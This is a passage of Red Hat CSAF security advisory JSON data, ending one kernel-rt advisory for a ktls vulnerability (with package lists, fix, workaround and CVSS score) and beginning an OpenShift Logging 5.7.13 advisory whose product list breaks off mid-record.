"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-0646"
},
{
"category": "external",
"summary": "RHBZ#2253908",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2253908"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-0646",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0646"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-0646",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0646"
},
{
"category": "external",
"summary": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c5a595000e267",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c5a595000e267"
}
],
"release_date": "2023-12-07T06:30:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-03-12T11:49:04+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1269"
},
{
"category": "workaround",
"details": "To mitigate this issue, prevent module tls from being loaded. Please see https://access.redhat.com/solutions/41278 for how to blacklist a kernel module to prevent it from loading automatically.",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "kernel: ktls overwrites readonly memory pages when using function splice with a ktls socket as destination"
}
]
}
rhsa-2024_2093
Vulnerability from csaf_redhat
Published
2024-05-01 07:47
Modified
2024-12-04 16:26
Summary
Red Hat Security Advisory: security update Logging for Red Hat OpenShift - 5.7.13
Notes
Topic
Moderate Logging for Red Hat OpenShift - 5.7.13
Details
Logging for Red Hat OpenShift - 5.7.13
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Moderate Logging for Red Hat OpenShift - 5.7.13",
"title": "Topic"
},
{
"category": "general",
"text": "Logging for Red Hat OpenShift - 5.7.13",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:2093",
"url": "https://access.redhat.com/errata/RHSA-2024:2093"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "LOG-5243",
"url": "https://issues.redhat.com/browse/LOG-5243"
},
{
"category": "external",
"summary": "LOG-5278",
"url": "https://issues.redhat.com/browse/LOG-5278"
},
{
"category": "external",
"summary": "LOG-5393",
"url": "https://issues.redhat.com/browse/LOG-5393"
},
{
"category": "external",
"summary": "LOG-5399",
"url": "https://issues.redhat.com/browse/LOG-5399"
},
{
"category": "external",
"summary": "LOG-5403",
"url": "https://issues.redhat.com/browse/LOG-5403"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_2093.json"
}
],
"title": "Red Hat Security Advisory: security update Logging for Red Hat OpenShift - 5.7.13",
"tracking": {
"current_release_date": "2024-12-04T16:26:22+00:00",
"generator": {
"date": "2024-12-04T16:26:22+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.1"
}
},
"id": "RHSA-2024:2093",
"initial_release_date": "2024-05-01T07:47:45+00:00",
"revision_history": [
{
"date": "2024-05-01T07:47:45+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-05-01T07:47:45+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-04T16:26:22+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "RHOL 5.7 for RHEL 8",
"product": {
"name": "RHOL 5.7 for RHEL 8",
"product_id": "8Base-RHOL-5.7",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:logging:5.7::el8"
}
}
}
],
"category": "product_family",
"name": "logging for Red Hat OpenShift"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"product": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"product_id": "openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-rhel8-operator\u0026tag=v5.7.13-7"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"product": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"product_id": "openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-rhel8-operator\u0026tag=v5.7.13-9"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"product": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"product_id": "openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-proxy-rhel8\u0026tag=v1.0.0-480"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"product": {
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"product_id": "openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/log-file-metric-exporter-rhel8\u0026tag=v1.1.0-228"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"product": {
"name": "openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"product_id": "openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/logging-curator5-rhel8\u0026tag=v5.8.1-471"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"product": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"product_id": "openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch6-rhel8\u0026tag=v6.8.1-408"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"product": {
"name": "openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"product_id": "openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/eventrouter-rhel8\u0026tag=v0.4.0-248"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"product": {
"name": "openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"product_id": "openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/fluentd-rhel8\u0026tag=v1.14.6-215"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"product": {
"name": "openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"product_id": "openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/kibana6-rhel8\u0026tag=v6.8.1-431"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"product": {
"name": "openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"product_id": "openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/logging-loki-rhel8\u0026tag=v2.9.6-15"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le",
"product": {
"name": "openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le",
"product_id": "openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/vector-rhel8\u0026tag=v0.28.1-57"
}
}
},
{
"category": "product_version",
